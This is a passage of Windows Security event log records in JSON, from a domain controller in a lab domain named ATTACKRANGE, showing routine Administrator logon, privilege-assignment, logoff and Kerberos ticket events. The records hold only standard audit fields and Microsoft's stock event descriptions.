command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220579,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9BE33\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9be33","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220580,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9BE33\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9be33","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220581,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9BE33\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9be33","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220582,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220583,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220584,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220585,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9BE54\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9be54","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220586,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9BE54\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9be54","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220587,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79895\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x79895","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220588,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x795A2\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x795a2","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220589,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9BE54\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9be54","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220590,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220591,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220592,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
